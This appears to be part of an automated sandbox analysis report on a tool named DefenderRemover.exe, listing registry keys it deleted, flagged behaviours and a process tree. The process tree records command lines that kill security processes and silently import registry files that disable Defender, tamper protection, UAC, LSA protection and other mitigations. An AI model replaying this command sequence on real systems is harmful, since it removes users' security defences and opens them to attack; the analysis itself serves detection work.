| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\Instance\InitPropertyBag | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E48B2549-D510-4A76-8A5F-FC126A6215F0}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E48B2549-D510-4A76-8A5F-FC126A6215F0} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\DefaultIcon | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{a3b3c46c-05d8-429b-bf66-87068b4ce563}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\ShellFolder | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\ImmutableMuiCache\Strings | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\MuiCache | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{01afc156-f2eb-4c1c-a722-8550417d396f}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{a3b3c46c-05d8-429b-bf66-87068b4ce563} | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\ImmutableMuiCache | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Extensions\ProgIDs\AppXb5yxv86nkhp530y0y50yxe69c1qwad1x | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{05F3561D-0358-4687-8ACD-A34D24C488DF} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{a3b3c46c-05d8-429b-bf66-87068b4ce563}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{a3b3c46c-05d8-429b-bf66-87068b4ce563} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.Defender | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{01afc156-f2eb-4c1c-a722-8550417d396f}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\ShellFolder | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\Instance\InitPropertyBag | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\Instance | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{01afc156-f2eb-4c1c-a722-8550417d396f} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A} | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\AppUserModelId\Microsoft.Windows.Defender | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{05F3561D-0358-4687-8ACD-A34D24C488DF}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\Instance | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\DefaultIcon | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E48B2549-D510-4A76-8A5F-FC126A6215F0}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{05F3561D-0358-4687-8ACD-A34D24C488DF} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{05F3561D-0358-4687-8ACD-A34D24C488DF}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.SecurityAndMaintenance | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{01afc156-f2eb-4c1c-a722-8550417d396f} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E48B2549-D510-4A76-8A5F-FC126A6215F0} | C:\Windows\regedit.exe | N/A |
Runs .reg file with regedit
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\DefenderRemover.exe
"C:\Users\Admin\AppData\Local\Temp\DefenderRemover.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c .\Script_Run.bat
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im "explorer.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im "CompatTelRunner.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im "DWWIN.EXE"
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im "DeviceCensus.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im "GameBarPresenceWriter.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im "SecurityHealthHost.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im "SecurityHealthService.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im "SecurityHealthSystray.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im "smartscreen.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im "MsMpEng.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Antivirus_d.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Antivirus_d.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Defender Anti-Phishing_d.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Defender Anti-Phishing_d.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Defender and Security Center Notifications.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Antivirus_d.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Defender Anti-Phishing_d.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Defender and Security Center Notifications.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Defender Policies.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Antivirus_d.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Defender Anti-Phishing_d.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Defender and Security Center Notifications.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Defender Policies.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable LSA Protection.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Defender and Security Center Notifications.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Defender Policies.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable LSA Protection.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Microsoft Vulnerabile Driver Blocklist.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Defender Policies.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable LSA Protection.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Microsoft Vulnerabile Driver Blocklist.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable SmartScreen.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable LSA Protection.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Microsoft Vulnerabile Driver Blocklist.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable SmartScreen.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable System Mitigations.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Microsoft Vulnerabile Driver Blocklist.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable SmartScreen.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable System Mitigations.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Tamper Protection.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable SmartScreen.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable System Mitigations.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Tamper Protection.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable UAC.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable System Mitigations.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable UAC.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Tamper Protection.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable VBS.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Tamper Protection.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable UAC.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable VBS.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Exploit Guard_d.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable UAC.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable VBS.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Exploit Guard_d.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable VBS.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\LockDown Windows Defender Security Center.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Exploit Guard_d.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\LockDown Windows Defender Security Center.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Exploit Guard_d.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Mitigation of Fault Torelant Heap.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\LockDown Windows Defender Security Center.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Mitigation of Fault Torelant Heap.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\LockDown Windows Defender Security Center.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\No more Delay and Timeouts.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\No more Delay and Timeouts.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Anti-Phishing Services.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Mitigation of Fault Torelant Heap.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\No more Delay and Timeouts.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Mitigation of Fault Torelant Heap.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Anti-Phishing Services.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\No more Delay and Timeouts.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of SecHealthUI.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Anti-Phishing Services.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of SecHealthUI.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Windows Defender Antivirus.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Anti-Phishing Services.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Windows Defender Antivirus.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of SecHealthUI.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Windows Security Action Center.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of SecHealthUI.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Windows Defender Antivirus.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Windows Security Action Center.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Defender Tasks.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Windows Defender Antivirus.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Windows Security Action Center.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Defender Tasks.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Security and Maintenance.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Windows Security Action Center.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Defender Tasks.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Security and Maintenance.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
